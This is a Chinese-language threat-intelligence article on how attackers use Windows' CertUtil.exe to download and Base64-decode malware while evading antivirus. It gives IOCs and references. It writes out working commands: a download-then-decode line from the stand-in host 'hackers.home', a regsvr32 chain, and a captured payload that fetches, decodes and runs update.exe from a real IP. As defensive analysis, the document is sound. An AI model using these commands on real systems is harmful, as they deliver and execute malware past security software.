使用CertUtil.exe下載遠程文件

使用CertUtil.exe下載遠程文件

證書 http://www.javashuo.com/article/p-cjzyvbca-ey.html

 

一、前言

通過國外文章信息，CertUtil.exe下載惡意軟件的樣本。

二、實現原理

Windows有一個名爲CertUtil的內置程序，可用於在Windows中管理證書。使用此程序能夠在Windows中安裝，備份，刪除，管理和執行與證書和證書存儲相關的各類功能。

CertUtil的一個特性是可以從遠程URL下載證書或任何其餘文件。

使用語法 :

"certutil.exe -urlcache -split -f [URL] output.file" 

Casey Smith(https://twitter.com/subTee) 在2017年就已經公佈的相關利用方法。

certutil -urlcache -split -f [serverURL] file.blah regsvr32.exe /s /u /I:file.blah scrub.dll

三、實際例子

目前在威脅情報平臺裏已經能夠搜索到利用這種手法的相關病毒樣本，樣本中利用的方法：

四、混淆方式

• 使用CertUtil + Base64來繞過安全軟件

經過Base64對惡意文件進行編碼，使惡意代碼樣本看起來像是無害的文本文件，而後使用CertUtil.exe下載後對其進行解碼。下載了文本文件使用「Certutil.exe -decode」命令將Base64編碼文件解碼爲可執行文件。

C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt C:\Temp>certutil.exe -decode bad.txt bad.exe 

在F5 Labs上有一篇利用漏洞的文章中提到了利用certutil下載文件的方式攻擊Web服務器。Payload部份內容以下：

一旦文件下載並使用certutil進行 base64解碼，它將被保存爲update.exe並執行。

certutil -urlcache -split -f http://45.77.55.231/update.b64 update.b64＆certutil -decode update.b64 update.exe＆update.exe

五、樣本HASH與分析結果

• 分析平臺分析結果：

https://www.hybrid-analysis.com/sample/87cf118bff58c38bc0d54c1d3fcc553e381df838437a99a2006dd8f726406c16?environmentId=100 https://www.virustotal.com/en/file/1a3cd50fcc7a454025a641ffcc941353b4a7998c36066b399c72cb8cbff61071/analysis/1522278762/ https://www.hybrid-analysis.com/sample/4faf0c88f41121038709e9a9d134736dfadf6e1f1f4fdb6812fc69818a9e8572?environmentId=100 https://www.hybrid-analysis.com/sample/3bdecb8b3aaad6822a15011e5c9f10663c3ead64a61350148518b32f176ba02c?environmentId=100 

• IOC(Indicators of Compromise)

• • IP:

45[.]77[.]55[.]231 181[.]214[.]87[.]240 181[.]214[.]87[.]241 148[.]251[.]133[.]246

• • 文件名與HASH值:

update.b64: 66107b01bc93c8d4cf2e8a6a8faffb56 update.exe: 5bb5d3cb837d97174eddc681ca98aa80 msi64.zip: 8d8b8abe93aea52f9865f045a49912ae SearchIndexer.exe: 1dd8ea5dd6975eb3d0dd14d71d1a404d mssearch.exe: 47d3a5023d0cbe76a030bfac7bcfe2f2

六、參考

https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
https://f5.com/labs/articles/threat-intelligence/malware/old-dog-new-targets-switching-to-windows-to-mine-electroneum
https://www.bleepingcomputer.com/news/security/regsvr32-can-be-used-to-install-ransomware-through-jscript-installers/

 

=========================== End